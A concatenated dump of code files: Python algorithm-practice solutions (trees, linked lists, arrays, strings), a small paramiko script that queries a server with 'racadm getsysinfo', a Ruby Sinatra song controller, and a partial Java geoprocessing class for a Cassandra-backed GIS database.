                rnode = None
            i += 2
            l = True
    return root
if __name__ == "__main__":
    # root1: letter-labeled tree used for the one-stack postorder demo.
    a = TreeNode('A')
    i = TreeNode('C')
    d = TreeNode('E')
    c = TreeNode('D', left=i, right=d)
    b = TreeNode('B', left=a, right=c)
    g = TreeNode('H')
    f = TreeNode('I', left=g)
    e = TreeNode('G', right=f)
    root1 = TreeNode('F', left=b, right=e)
    # `one`: small numeric tree (1..7) kept for the two-stack variant.
    four = TreeNode('4')
    five = TreeNode('5')
    six = TreeNode('6')
    seven = TreeNode('7')
    three = TreeNode('3', left=six, right=seven)
    two = TreeNode('2', left=four, right=five)
    one = TreeNode('1', left=two, right=three)
    # print(preOrderTraversal(root))
    # print(inorderTraversal(root))
    # print(postOrderTraversal(root))
    # (A large generated test array for generateVeryLargeInput/postOrderTraversal
    #  was kept here, commented out; elided for brevity.)
    # root2 = generateVeryLargeInput(arr)
    # print(postOrderTraversal(root2))
    # print(postOrderTraveralUsingTwoStacks(one))
    print(postOrderTraversalUsingOneStack(root1))
<file_sep>/LinkedListIntersection.py
# Definition for singly-linked list.
class ListNode:
    # Singly-linked list node: `val` payload plus `next` pointer.
    def __init__(self, x, next=None):
        self.val = x
        self.next = next
class Solution:
    def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
        """Return the node where the two lists merge, or None if they never do.

        Intersecting lists must share their final node, so the tails are
        compared first.  The cursor into the longer list then gets a head
        start equal to the length difference, after which both cursors
        advance in lockstep until they coincide.
        """
        len_a, tail_a = self._getLengthAndTail(headA)
        len_b, tail_b = self._getLengthAndTail(headB)
        if tail_a is not tail_b:
            # Different final nodes -> the lists are disjoint.
            return None
        # Give the longer list's cursor a head start.
        if len_a >= len_b:
            long_cur, short_cur = headA, headB
        else:
            long_cur, short_cur = headB, headA
        for _ in range(abs(len_a - len_b)):
            long_cur = long_cur.next
        # Walk both cursors together until they meet.
        while short_cur is not long_cur:
            short_cur = short_cur.next
            long_cur = long_cur.next
        return short_cur

    def _getLengthAndTail(self, head: ListNode) -> (int, ListNode):
        """Return (length, tail node) of the list; (0, None) for an empty one."""
        if not head:
            return 0, None
        count = 1
        node = head
        while node.next is not None:
            node = node.next
            count += 1
        return count, node
if __name__ == "__main__":
    # Fixture: list A = 3-1-5-9-7-2-1, list B = 4-6 joining A at node 7.
    """
    3-1-5-9-7-2-1
        |
      4-6
    """
    A1 = ListNode(1)
    A2 = ListNode(2, A1)
    A3 = ListNode(7, A2)
    A4 = ListNode(9, A3)
    A5 = ListNode(5, A4)
    A6 = ListNode(1, A5)
    A7 = ListNode(3, A6)
    B1 = ListNode(6,A3)
    B2 = ListNode(4, B1)
    sol = Solution()
    intersect_node = sol.getIntersectionNode(A7, B2)
    # Expected output for this fixture: 7 (the shared node's value).
    if intersect_node:
        print(intersect_node.val)
    else:
        print("No intersection")
<file_sep>/scratch.py
import os
def jumpingOnClouds(c):
    """Return the minimum number of jumps from cloud 0 to the last cloud.

    A jump advances 1 or 2 positions and may only land on safe clouds
    (value 0).  Greedy is optimal because thunderclouds (value 1) are
    never adjacent: when c[i + 2] is a thundercloud, c[i + 1] must be
    safe, so preferring the long jump never gets stuck.

    (The previous revision walked the array in fixed steps of two and
    merely counted safe neighbor pairs — it returned 1 for the sample
    input [0,1,0,0,0,1,0] instead of the correct 3.)
    """
    jumps = 0
    i = 0
    last = len(c) - 1
    while i < last:
        # Take the long jump whenever it lands on a safe cloud.
        if i + 2 <= last and c[i + 2] == 0:
            i += 2
        else:
            i += 1
        jumps += 1
    return jumps
class Node:
    # Singly-linked list node: `data` payload plus `next` pointer.
    def __init__(self, data):
        self.data = data
        self.next = None
class Solution:
    def display(self, head):
        """Print every value in the list on one line, space-separated."""
        node = head
        while node:
            print(node.data, end=' ')
            node = node.next

    def insert(self, head, data):
        """Append a new Node holding `data`; return the (possibly new) head."""
        tail = Node(data)
        if head is None:
            return tail
        node = head
        while node.next is not None:
            node = node.next
        node.next = tail
        return head
if __name__ == '__main__':
    # Build the list 2 -> 4 -> 3 -> 1 by repeated appends, then print it.
    mylist = Solution()
    head = None
    for i in [2, 4, 3, 1]:
        head = mylist.insert(head, i)
    mylist.display(head)
    # Minimum-jumps demo for jumpingOnClouds (expected result: 3).
    c = [0, 1, 0, 0, 0, 1, 0]
    result = jumpingOnClouds(c)
print(result)<file_sep>/DeleteNthLastNode.py
# Definition for singly-linked list.
class ListNode:
    # Singly-linked list node: `val` payload plus `next` pointer.
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next
class Solution:
    """Operations addressing a list node by its position from the end,
    e.g. for 1-2-3-4-5 and n = 2 the target node is 4."""

    def findNthFromEnd(self, head: ListNode, n: int):
        """Print the value of the n-th node from the end (recursive).

        Each frame returns its node's 1-based position from the end so
        the caller one frame up can keep counting.
        """
        if not head:
            return 0
        position = 1 + self.findNthFromEnd(head.next, n)
        if position == n:
            print(head.val)
        return position

    def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
        """Delete the n-th node from the end and return the new head.

        Two cursors kept n+1 links apart: when the leading cursor runs
        off the list, the trailing cursor sits just before the victim.
        The sentinel makes removing the head itself a non-special case.
        """
        sentinel = ListNode(0)
        sentinel.next = head
        lead = sentinel
        trail = sentinel
        steps = n + 1
        while steps > 0:
            lead = lead.next
            steps -= 1
        while lead is not None:
            lead = lead.next
            trail = trail.next
        trail.next = trail.next.next
        return sentinel.next
if __name__ == "__main__":
    # l3..l5 are prepared but deliberately unlinked: the active list is 1 -> 2.
    l5 = ListNode(5)
    l4 = ListNode(4, l5)
    l3 = ListNode(3, l4)
    #l2 = ListNode(2, l3)
    l2 = ListNode(2)
    l1 = ListNode(1, l2)
    sol = Solution()
    #sol.findNthFromEnd(l1, 0)
    # Remove the 2nd node from the end of 1 -> 2, i.e. node 1; head becomes 2.
    head = sol.removeNthFromEnd(l1, 2)
print(head.val)<file_sep>/LongestSubstring.py
def lengthOfLongestSubstring(s: str) -> int:
    """Length of the longest substring of `s` without repeating characters.

    Sliding window: `start` marks the left edge of the current
    duplicate-free window, and `last_seen` maps each character to the
    index just past its most recent occurrence, so hitting a repeat
    shrinks the window in O(1).
    """
    last_seen = {}
    best = 0
    start = 0
    for idx, ch in enumerate(s):
        if ch in last_seen:
            # Never move the window's left edge backwards.
            start = max(last_seen[ch], start)
        best = max(best, idx - start + 1)
        last_seen[ch] = idx + 1
    return best
if __name__ == "__main__":
print(lengthOfLongestSubstring(" "))<file_sep>/MinDistanceBetweenWords.py
from typing import List
class Solution(object):
    def shortestDistance(self, wordsList: List[str], word1: str, word2: str) -> int:
        """Return the smallest index distance between any occurrence of
        `word1` and any occurrence of `word2` in `wordsList`.

        Single pass: remember the latest index of each target word and
        update the best gap whenever either one is seen.  Assumes both
        words occur (LeetCode 243 guarantee).

        (Rewrites the previous version's magic 99999999 sentinel and the
        duplicated, off-by-one-prone `pos + 1` bookkeeping.)
        """
        last1 = -1  # most recent index of word1 (-1 = not seen yet)
        last2 = -1  # most recent index of word2
        best = len(wordsList)  # safe upper bound: any real gap is smaller
        for idx, word in enumerate(wordsList):
            if word == word1:
                last1 = idx
            elif word == word2:
                last2 = idx
            else:
                continue
            if last1 >= 0 and last2 >= 0:
                gap = abs(last1 - last2)
                if gap < best:
                    best = gap
                    if best == 1:
                        # 1 is the minimum possible distance; stop early.
                        return best
        return best
if __name__ == "__main__":
    sol = Solution()
    # Expected: 1 ("practice" and "coding" are adjacent).
    print(sol.shortestDistance(["perfect", "makes", "practice", "coding", "makes"], "practice", "coding"))
    # Expected: 1 (the closest "makes" is right after "coding").
    print(sol.shortestDistance(["perfect", "makes", "practice", "coding", "makes"], "makes", "coding"))
print(sol.shortestDistance(["perfect", "coding", "practice", "makes", "makes"], "perfect", "makes"))<file_sep>/RemoveArrayDuplicates.py
from typing import List
def removeDuplicates(nums: List[int]) -> int:
    """Remove duplicates from a sorted list in place and return the new
    length; the first k slots of `nums` hold the k unique values.

    Classic read/write two-pointer sweep.  (The previous revision ended
    with `nums = nums[:i + 1]`, which only rebound a local name — the
    caller's list was never truncated.  `del nums[...]` does it in place.)
    """
    if not nums:
        return 0
    write = 0
    for read in range(1, len(nums)):
        if nums[read] != nums[write]:
            write += 1
            nums[write] = nums[read]
    del nums[write + 1:]  # truly truncate the caller's list
    return write + 1
if __name__ == "__main__":
    # Expected output: 5 (unique values 0,1,2,3,4).
    nums = [0,0,1,1,1,2,2,3,3,4]
    print(removeDuplicates(nums))
from typing import List
def merge(nums1: List[int], m: int, nums2: List[int], n: int) -> None:
    """Merge sorted `nums2` into sorted `nums1` in place.

    `nums1` holds m valid values followed by at least n slots of slack.
    Filling from the back (largest first) lets the merge run without any
    extra buffer.  Returns nothing; `nums1` is modified in place.
    """
    i = m - 1  # last valid element of nums1
    j = n - 1  # last element of nums2
    for k in range(m + n - 1, -1, -1):
        if j < 0:
            # nums2 exhausted: the remaining nums1 prefix is already in place.
            break
        if i >= 0 and nums1[i] > nums2[j]:
            nums1[k] = nums1[i]
            i -= 1
        else:
            nums1[k] = nums2[j]
            j -= 1
if __name__ == "__main__":
    # Expected output: [1, 2] (nums2's 1 merged before nums1's 2).
    nums1 = [2,0]
    nums2 = [1]
    merge(nums1, 1, nums2, 1)
print(nums1)<file_sep>/ClassesAndInheritance.py
import paramiko
import logging
def try_ssh_connect():
    """Connect to a hard-coded test host over SSH, run `racadm getsysinfo`,
    log the output, and terminate the process: exit code 0 on success,
    1 on any paramiko failure.

    Fixes over the previous revision:
    - `password=<PASSWORD>` in the connect() call was a syntax error;
      the `password` variable is now passed.
    - `transport` is pre-bound to None so the `finally` block cannot
      raise NameError (masking the real exception) when connect() fails
      before a transport exists.
    """
    logging.basicConfig(level=logging.DEBUG)
    logger = logging.getLogger('ssh_test_app')
    logging.getLogger("paramiko").setLevel(logging.DEBUG)
    host = '192.168.3.11'
    password = '<PASSWORD>'  # anonymized placeholder credential
    username = 'root'
    port = 22
    client = paramiko.SSHClient()
    client.load_system_host_keys()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    retval = 0
    cmd = 'racadm getsysinfo'
    transport = None  # bound early: the finally block must not NameError
    try:
        client.connect(host, port=port, username=username, password=password,
                       allow_agent=False, look_for_keys=False)
        transport = client.get_transport()
        if not transport.is_authenticated():
            # Fall back to keyboard-interactive auth if needed.
            transport.auth_interactive_dumb(username)
        if transport.is_authenticated():
            logger.info('transport is authenticated')
            _stdin, stdout, stderr = client.exec_command(cmd)
            res = stdout.read()
            logger.info('Command {0}:\n{1}'.format(cmd, res))
        else:
            logger.error('transport is not authenticated')
    except paramiko.AuthenticationException:
        logger.error('paramiko.AuthenticationException')
        retval = 1
    except paramiko.BadHostKeyException:
        logger.error('paramiko.BadHostKeyException')
        retval = 1
    except paramiko.SSHException:
        logger.error('paramiko.SSHException')
        retval = 1
    finally:
        if transport is not None:
            transport.close()
        client.close()  # release the socket even if connect() failed early
    logger.info('Exiting at end of script: exit code {0}'.format(retval))
    exit(retval)
# NOTE(review): the membership test works ('__main__' in '__main__'), but the
# conventional guard is `__name__ == "__main__"`.  try_ssh_connect() calls
# exit(), so nothing after this call runs.
if "__main__" in __name__:
    try_ssh_connect()
print("Done")<file_sep>/TwoSum.py
"""
Learnt that python dict does not return anything(empty)
when the value is a 0 (int) so have to convert to str-int
"""
def twoSum(nums, target):
diff_map = {}
for i in range(len(nums)):
if diff_map.get(target - nums[i]):
return [int(diff_map.get(target - nums[i])), i]
diff_map[nums[i]] = str(i)
return []
if __name__ == "__main__":
    # Expected output: [0, 1] (2 + 7 == 9).
    nums = [2,7,11,15]
print(twoSum(nums, 9))<file_sep>/Concepts/TreeTraversal.py
class TreeNode(object):
    # Binary-tree node: `val` payload plus `left`/`right` children.
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right
def preOrderRec(root):
    """Root-left-right traversal, recursively; [] for an empty tree."""
    if root is None:
        return []
    left_part = preOrderRec(root.left)
    right_part = preOrderRec(root.right)
    return [root.val] + left_part + right_part
def preOrderIter(root):
    """Root-left-right traversal with an explicit stack; [] for empty tree."""
    if root is None:
        return []
    order = []
    pending = [root]
    while pending:
        node = pending.pop()
        order.append(node.val)
        # Push right before left so the left subtree is visited first.
        for child in (node.right, node.left):
            if child is not None:
                pending.append(child)
    return order
def inOrderRec(root):
    """Left-root-right traversal, recursively; [] for an empty tree."""
    return [] if root is None else inOrderRec(root.left) + [root.val] + inOrderRec(root.right)
def inOrderIter(root):
    """Left-root-right traversal using an explicit stack; [] for empty tree."""
    if root is None:
        return []
    order = []
    trail = []
    node = root
    while node is not None or trail:
        if node is not None:
            # Slide down the left spine, remembering ancestors.
            trail.append(node)
            node = node.left
        else:
            node = trail.pop()
            order.append(node.val)
            node = node.right
    return order
def postOrderRec(root):
    """Left-right-root traversal, recursively; [] for an empty tree."""
    if root is None:
        return []
    out = postOrderRec(root.left)
    out.extend(postOrderRec(root.right))
    out.append(root.val)
    return out
def postOrderIter(root):
    """Left-right-root traversal with an explicit stack; [] for empty tree.

    Uses the reverse-preorder trick: visit root, right, left with one
    stack, then reverse the result to obtain left, right, root.

    (The previous revision initialized the stack empty, so `while stck:`
    never ran, and the function fell off the end returning None.)
    """
    if root is None:
        return []
    visited = []
    stack = [root]
    while stack:
        node = stack.pop()
        visited.append(node.val)
        if node.left is not None:
            stack.append(node.left)
        if node.right is not None:
            stack.append(node.right)
    return visited[::-1]
if __name__ == "__main__":
    # Sample tree:    3
    #                / \
    #               2   4
    #                  /
    #                 1
    c = TreeNode(1)
    b = TreeNode(2)
    a = TreeNode(4, left=c)
    root = TreeNode(3, left=b, right=a)
    # print(preOrderRec(root))
    # print(preOrderIter(root))
    #print(inOrderRec(root))
    #print(inOrderIter(root))
    #print(postOrderRec(root))
print(postOrderIter(root)) | 3ebcc04415d9384833afa85e1317654d15c3d326 | [
"Python"
] | 18 | Python | bdaniel16/PracticeQuestionsAndConcepts | a2ac29bde79db1e2c190899628b807cde78d79bb | 79c731266f922f9d596db02dac7b1ee635b648a8 |
refs/heads/master | <repo_name>andrewrosario/playlister-sinatra-austin-web-080519<file_sep>/app/controllers/songs_controller.rb
require 'pry'
class SongsController < ApplicationController
get '/songs' do
@songs = Song.all
erb :song_index
end
get '/songs/new' do
@artists = Artist.all
@genres = Genre.all
erb :new_song
end
post '/songs' do
if !params["artist_name"].empty?
if Artist.all.include?(Artist.all.find{|artist| artist.name == params["artist_name"]})
new_artist = Artist.all.find{|artist| artist.name == params["artist_name"]}
else
new_artist = Artist.create(name: params["artist_name"])
end
new_song = Song.create(name: params["Name"], artist_id: new_artist.id)
else
new_song = Song.create(name: params["Name"], artist_id: params["artist_id"].to_i)
end
new_song.genres << Genre.find(params["genre_id"])
new_song.save
redirect to "/songs/#{new_song.slug}"
end
get '/songs/:slug' do
@song = Song.find_by_slug(params[:slug])
erb :song_show
end
get '/songs/:slug/edit' do
@song = Song.find_by_slug(params[:slug])
@artists = Artist.all
@genres = Genre.all
erb :edit_song
end
patch '/songs/:slug' do
@song = Song.find_by_slug(params[:slug])
if !params["artist_name"].empty?
if Artist.all.include?(Artist.all.find{|artist| artist.name == params["artist_name"]})
new_artist = Artist.all.find{|artist| artist.name == params["artist_name"]}
else
new_artist = Artist.create(name: params["artist_name"])
end
@song.artist = new_artist
end
if !(params["genre_id"] == nil)
genre_array = params["genre_id"].map {|genre_id| Genre.find(genre_id)}
@song.genres = genre_array
end
@song.save
redirect to "/songs/#{@song.slug}"
end
end
| b6ae4d0080fe99531c9c1072942f385823dff5fa | [
"Ruby"
] | 1 | Ruby | andrewrosario/playlister-sinatra-austin-web-080519 | 08c4d9fa4cee67a461d4a70155b59725bd965d64 | 29cb74ab32fe332a8325e985bb8caccf799c444a |
refs/heads/master | <repo_name>matheus0392/BDG_Cassandra<file_sep>/BDGCassandra/src/Cassandra/gis/geoprocessing/Funcoes.java
package Cassandra.gis.geoprocessing;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.util.ArrayList;
import java.util.List;
import org.json.JSONException;
import com.esri.core.geometry.Geometry;
import com.esri.core.geometry.Line;
import com.esri.core.geometry.MultiPoint;
import com.esri.core.geometry.OperatorContains;
import com.esri.core.geometry.OperatorCrosses;
import com.esri.core.geometry.OperatorDisjoint;
import com.esri.core.geometry.OperatorDistance;
import com.esri.core.geometry.OperatorExportToGeoJson;
import com.esri.core.geometry.OperatorImportFromGeoJson;
import com.esri.core.geometry.OperatorIntersects;
import com.esri.core.geometry.OperatorOverlaps;
import com.esri.core.geometry.OperatorTouches;
import com.esri.core.geometry.OperatorWithin;
import com.esri.core.geometry.Point;
import com.esri.core.geometry.Point2D;
import com.esri.core.geometry.Polygon;
import com.esri.core.geometry.Polyline;
import com.esri.core.geometry.ProgressTracker;
import com.esri.core.geometry.SpatialReference;
import Cassandra.gis.db.BDgeo;
import Cassandra.gis.db.Geo;
import Cassandra.gis.db.Propriedade;
//esta classe é responsável pelo processamento geoespacial
@SuppressWarnings("unused")
public class Funcoes {
    // Data-access object used by every query/geoprocessing method below.
    private BDgeo BancoDados;
    // Scratch reference reused by GeoJson2Geometry while parsing features.
    private Geo geo;
    // Requires a non-null database handle.
    public Funcoes(BDgeo bd){
        if (bd==null)
            throw new NullPointerException();
        BancoDados= bd;
    }
/***
*
 * Aqui é a parte para criar funções específicas para
 * a aplicação desejada.
*
* A API/ESRI-java-geometry é utilizada para o geoprocessamento
* a partir de operadores. e.g. OperatorTouches.local().execute(...)
* foram feitos funções de teste para dados de arquivo de entrada
* 111.133km~1º
*/
/**********************************************************************/
//exemplos
//calcular todo o comprimento das geometrias com esse nome
    // Sums the length (in degrees) of every "Polyline" geometry matching
    // `nome`, prints the total (also scaled by 111.133 km/degree) and
    // returns the matched set serialized as GeoJSON (written to `path`).
    public String comprimento_total(String nome, String path){
        int g=0;   // geometries inspected
        int h=0;   // polylines actually measured
        double comprimento=0.0;
        String geojson;
        List<Geo> resultado=new ArrayList<Geo>();
        try {
            // NOTE(review): query mode 2 is defined by BDgeo.BuscarGeo —
            // presumably "select by name"; confirm against that class.
            resultado=BancoDados.BuscarGeo(2,nome);
        }catch (ClassNotFoundException e) {
            System.out.println(e.getMessage());
            e.printStackTrace();
        }
        for(int i=0;i<resultado.size();i++){
            g+=1;
            if (resultado.get(i).getTipo().equals("Polyline")){
                comprimento+=Comprimento(resultado.get(i));
                h+=1;
            }
        }
        System.out.println("comprimento total :"+h+"/"+g+": "+String.valueOf(comprimento)+"->"+String.valueOf(comprimento*111.133)+" kms");
        geojson=Geometry2GeoJson(resultado,path);
        return geojson;
    }
//localiza todas geometrias com esa propriedade dentro de um raio
    // Returns every geometry matching `nome` whose distance to the point
    // (latitude, longitude) falls within `raio`; the survivors are also
    // exported as GeoJSON to `path`.
    public List<Geo> localizar_raio(double latitude, double longitude, int raio, String nome, String path){
        int g=0;   // candidates compared
        int h=0;   // candidates discarded (outside the radius)
        double comprimento=0.0;   // unused
        Geo geo= new Geo();
        geo.setLatitude(latitude);
        geo.setLongitude(longitude);
        geo.setGeometria(new Point(latitude,longitude));
        double dist;
        List<Geo> resultado=new ArrayList<Geo>();
        try {
            resultado=BancoDados.BuscarGeo(3,nome);
        }catch (ClassNotFoundException e) {
            System.out.println(e.getMessage());
            e.printStackTrace();
        }
        for(int i=0;i<resultado.size();i++){
            g+=1;
            dist=Distancia(resultado.get(i),geo)*1000;// to metres
            System.out.println(String.valueOf(dist));
            // NOTE(review): dist is degrees*1000, scaled again by 111.133
            // here; the comparison is metres only if `raio` is in metres —
            // confirm the intended unit.
            if (dist* 111.133>raio){
                resultado.remove(i);
                i-=1;
                h+=1;
            }
        }
        System.out.print("comparacoes total :"+g);
        System.out.print(" comparacoes fora :"+h);
        System.out.println(" comparacoes dentro :"+String.valueOf(g-h));
        Geometry2GeoJson(resultado,path);
        return resultado;
    }
//busca uma geometria com o nome
//busca geometrias contidas
    // Returns every stored geometry spatially contained by the geometry
    // identified by `nome` (the reference geometry itself is excluded).
    public List<Geo> dentro (String nome, String path){
        List<Geo> geo=new ArrayList<Geo>();
        List<Geo> resultado=new ArrayList<Geo>();
        String geojson;   // unused
        int g=0;
        int h=0;
        try {
            // NOTE(review): modes 1 and 0 of BuscarGeo presumably mean
            // "single geometry by name" and "all geometries" — confirm.
            geo=BancoDados.BuscarGeo(1,nome);
            resultado=BancoDados.BuscarGeo(0,null);
        }catch (ClassNotFoundException e) {
            System.out.println(e.getMessage());
            e.printStackTrace();
        }
        // Exactly one reference geometry is expected for `nome`.
        if(geo.size()!=1){
            System.out.println("erro");
        }
        for(int i=0;i<resultado.size();i++){
            g+=1;
            // Drop candidates not contained by the reference, and the
            // reference itself (matched by id).
            if(!Contem(geo.get(0).getGeometria(),resultado.get(i).getGeometria()) || resultado.get(i).getId().equals(nome)){
                resultado.remove(i);
                i-=1;
                h+=1;
            }
        }
        System.out.print("comparacoes total :"+g);
        System.out.print(" comparacoes fora :"+h);
        System.out.println(" comparacoes dentro :"+String.valueOf(g-h));
        return resultado;
    }
    // Planar distance (in degrees) between the two geometries via the
    // ESRI distance operator.  A commented-out haversine variant is kept
    // below for reference.
    public double Distancia(Geo g1, Geo g2){
        /*double theta = g1.getLongitude() - g2.getLongitude();
        double distance = Math.sin(Math.toRadians(g1.getLatitude())) * Math.sin(Math.toRadians(g2.getLatitude())) +
                Math.cos(Math.toRadians(g1.getLatitude())) * Math.cos(Math.toRadians(g2.getLatitude())) *
                Math.cos(Math.toRadians(theta));
        distance = Math.acos(distance);
        distance = Math.toDegrees(distance);
        distance = distance * 111.133;
        return distance;
        */
        ProgressTracker pt = null;//= new ProgressTracker();
        SpatialReference.create(4326);   // NOTE(review): result is discarded
        double dist=OperatorDistance.local().execute(g1.getGeometria(), g2.getGeometria(), pt);
        return dist;
    }
public double Comprimento(Geo geo){
if (geo!=null){
return geo.getGeometria().calculateLength2D();
}
else return 0.0;
}
//
    // Prints the summed area of the geometries inside `nome` next to the
    // area of `nome` itself (and their ratio) and returns the contained
    // set serialized as GeoJSON.
    public String porcentagem_area(String nome, String path) throws ClassNotFoundException, NullPointerException{
        String geojson;
        List<Geo> lista= dentro(nome, path);
        List<Geo> id=BancoDados.BuscarGeo(2, nome);
        double a=area_total(lista);
        double at=area_total(id);
        System.out.println("area1:"+ String.valueOf(a));
        System.out.println("area2:"+ String.valueOf(at));
        // NOTE(review): at == 0 makes this print Infinity/NaN.
        System.out.println("area1/area2:"+ String.valueOf(a/at));
        geojson=Geometry2GeoJson(lista,path);
        return geojson;
    }
public double area_total(List<Geo> lista){
double area=0.0;
for(int i=0; i<lista.size();i++){
area+=lista.get(i).getGeometria().calculateArea2D();
}
area=area*111.133*111.133;
return area;
}
/*****************************************************/
//teste da API ESRI-geometry-java
    // Clears the database and repopulates it from the GeoJSON file (or
    // literal GeoJSON string) referenced by `path`.
    public void InicializarTestes(String path){
        BancoDados.LimparBanco();
        List<Geo> geo;
        try {
            geo = GeoJson2Geometry(path);
            ImportarBanco(geo);
        } catch (IOException e) {
            e.printStackTrace();
        } catch (JSONException e) {
            e.printStackTrace();
        }
    }
    // Pairwise containment report over the whole database: prints each
    // (container, contained) id pair, collects the containing geometry,
    // and returns the collected set serialized as GeoJSON.
    // NOTE(review): lista_geo stays null (NPE below) if ExportarBanco throws.
    public String testeContain(){
        List<Geo> lista_geo = null;
        List<Geo> lista = new ArrayList<Geo>();
        try {
            lista_geo = ExportarBanco();
        } catch (ClassNotFoundException e1) {
            e1.printStackTrace();
        } catch (NullPointerException e1) {
            e1.printStackTrace();
        }
        if(lista_geo.isEmpty()){
            System.out.println("banco vazio");
            return "banco vazio";
        }
        System.out.println("geometrias estao contidas:");
        for(int i=0;i<lista_geo.size()-1;i++){
            Geo geo=lista_geo.get(i);
            for(int j=i+1;j<lista_geo.size();j++){
                Geo geo2=lista_geo.get(j);
                if (Contem(geo.getGeometria(),geo2.getGeometria())){
                    System.out.println(geo.getId()+" "+geo2.getId());
                    lista.add(geo);
                    //j=lista_geo.size();
                }
                if (Contem(geo2.getGeometria(),geo.getGeometria())){
                    System.out.println(geo2.getId()+" "+geo.getId());
                    lista.add(geo2);
                    //j=lista_geo.size();
                }
            }
        }
        return Geometry2GeoJson(lista,null);
    }
    // Pairwise "crosses" report over the whole database: prints and
    // collects each crossing pair, returning them as GeoJSON.
    public String testeCrosses(){
        List<Geo> lista_geo = null;
        List<Geo> lista = new ArrayList<Geo>();
        try {
            lista_geo = ExportarBanco();
        } catch (ClassNotFoundException e1) {
            e1.printStackTrace();
        } catch (NullPointerException e1) {
            e1.printStackTrace();
        }
        if(lista_geo.isEmpty()){
            System.out.println("banco vazio");
            return "banco vazio";
        }
        System.out.println("geometrias se cruzam:");
        for(int i=0;i<lista_geo.size()-1;i++){
            Geo geo=lista_geo.get(i);
            for(int j=i+1;j<lista_geo.size();j++){
                Geo geo2=lista_geo.get(j);
                if (Cruza(geo.getGeometria(),geo2.getGeometria())){
                    System.out.println(geo.getId()+" "+geo2.getId());
                    lista.add(geo);
                    lista.add(geo2);
                    //	j=lista_geo.size();
                }
            }
        }
        return Geometry2GeoJson(lista,null);
    }
    // Pairwise disjointness report over the whole database: prints and
    // collects each disjoint pair, returning them as GeoJSON.
    public String testeDisjoint(){
        List<Geo> lista_geo = null;
        List<Geo> lista = new ArrayList<Geo>();
        try {
            lista_geo = ExportarBanco();
        } catch (ClassNotFoundException e1) {
            e1.printStackTrace();
        } catch (NullPointerException e1) {
            e1.printStackTrace();
        }
        if(lista_geo.isEmpty()){
            System.out.println("banco vazio");
            return "banco vazio";
        }
        System.out.println("geometrias disjuntas:");
        for(int i=0;i<lista_geo.size()-1;i++){
            Geo geo=lista_geo.get(i);
            for(int j=i+1;j<lista_geo.size();j++){
                Geo geo2=lista_geo.get(j);
                if (Disjunto(geo.getGeometria(),geo2.getGeometria())){
                    System.out.println(geo.getId()+" "+geo2.getId());
                    lista.add(geo);
                    lista.add(geo2);
                    //	j=lista_geo.size();
                }
            }
        }
        return Geometry2GeoJson(lista,null);
    }
    // Pairwise intersection report over the whole database: prints and
    // collects each intersecting pair, returning them as GeoJSON.
    // NOTE(review): the console header says "se tocam" (touch) although
    // the predicate tested here is Intersects.
    public String testeIntersect(){
        List<Geo> lista_geo = null;
        List<Geo> lista = new ArrayList<Geo>();
        try {
            lista_geo = ExportarBanco();
        } catch (ClassNotFoundException e1) {
            e1.printStackTrace();
        } catch (NullPointerException e1) {
            e1.printStackTrace();
        }
        if(lista_geo.isEmpty()){
            System.out.println("banco vazio");
            return "banco vazio";
        }
        System.out.println("geometrias se tocam:");
        for(int i=0;i<lista_geo.size()-1;i++){
            Geo geo=lista_geo.get(i);
            for(int j=i+1;j<lista_geo.size();j++){
                Geo geo2=lista_geo.get(j);
                if (Intersecta(geo.getGeometria(),geo2.getGeometria())){
                    System.out.println(geo.getId()+" "+geo2.getId());
                    lista.add(geo);
                    lista.add(geo2);
                    //	j=lista_geo.size();
                }
            }
        }
        return Geometry2GeoJson(lista,null);
    }
    // Pairwise overlap report over the whole database: prints and
    // collects each overlapping pair, returning them as GeoJSON.
    public String testeOverlap(){
        List<Geo> lista_geo = null;
        List<Geo> lista = new ArrayList<Geo>();
        try {
            lista_geo = ExportarBanco();
        } catch (ClassNotFoundException e1) {
            e1.printStackTrace();
        } catch (NullPointerException e1) {
            e1.printStackTrace();
        }
        if(lista_geo.isEmpty()){
            System.out.println("banco vazio");
            return "banco vazio";
        }
        System.out.println("geometrias se sobrepoe:");
        for(int i=0;i<lista_geo.size()-1;i++){
            Geo geo=lista_geo.get(i);
            for(int j=i+1;j<lista_geo.size();j++){
                Geo geo2=lista_geo.get(j);
                if (Sobrepoe(geo.getGeometria(),geo2.getGeometria())){
                    System.out.println(geo.getId()+" "+geo2.getId());
                    lista.add(geo);
                    lista.add(geo2);
                    //j=lista_geo.size();
                }
            }
        }
        return Geometry2GeoJson(lista,null);
    }
    // Pairwise "touches" report over the whole database: prints and
    // collects each touching pair, returning them as GeoJSON.
    public String testeTouch(){
        List<Geo> lista_geo = null;
        List<Geo> lista = new ArrayList<Geo>();
        try {
            lista_geo = ExportarBanco();
        } catch (ClassNotFoundException e1) {
            e1.printStackTrace();
        } catch (NullPointerException e1) {
            e1.printStackTrace();
        }
        if(lista_geo.isEmpty()){
            System.out.println("banco vazio");
            return "banco vazio";
        }
        System.out.println("geometrias se tocam:");
        for(int i=0;i<lista_geo.size()-1;i++){
            Geo geo=lista_geo.get(i);
            for(int j=i+1;j<lista_geo.size();j++){
                Geo geo2=lista_geo.get(j);
                if (Toca(geo.getGeometria(),geo2.getGeometria())){
                    System.out.println(geo.getId()+" "+geo2.getId());
                    lista.add(geo);
                    lista.add(geo2);
                }
            }
        }
        return Geometry2GeoJson(lista,null);
    }
    // Pairwise "within" report over the whole database: checks both
    // orderings of each pair, prints the ids, collects the inner
    // geometry, and returns the collected set as GeoJSON.
    public String testeWithin(){
        List<Geo> lista_geo = null;
        List<Geo> lista = new ArrayList<Geo>();
        try {
            lista_geo = ExportarBanco();
        } catch (ClassNotFoundException e1) {
            e1.printStackTrace();
        } catch (NullPointerException e1) {
            e1.printStackTrace();
        }
        if(lista_geo.isEmpty()){
            System.out.println("banco vazio");
            return "banco vazio";
        }
        System.out.println("geometrias dentro")
;
        for(int i=0;i<lista_geo.size()-1;i++){
            Geo geo=lista_geo.get(i);
            for(int j=i+1;j<lista_geo.size();j++){
                Geo geo2=lista_geo.get(j);
                if (Dentro(geo.getGeometria(),geo2.getGeometria())){
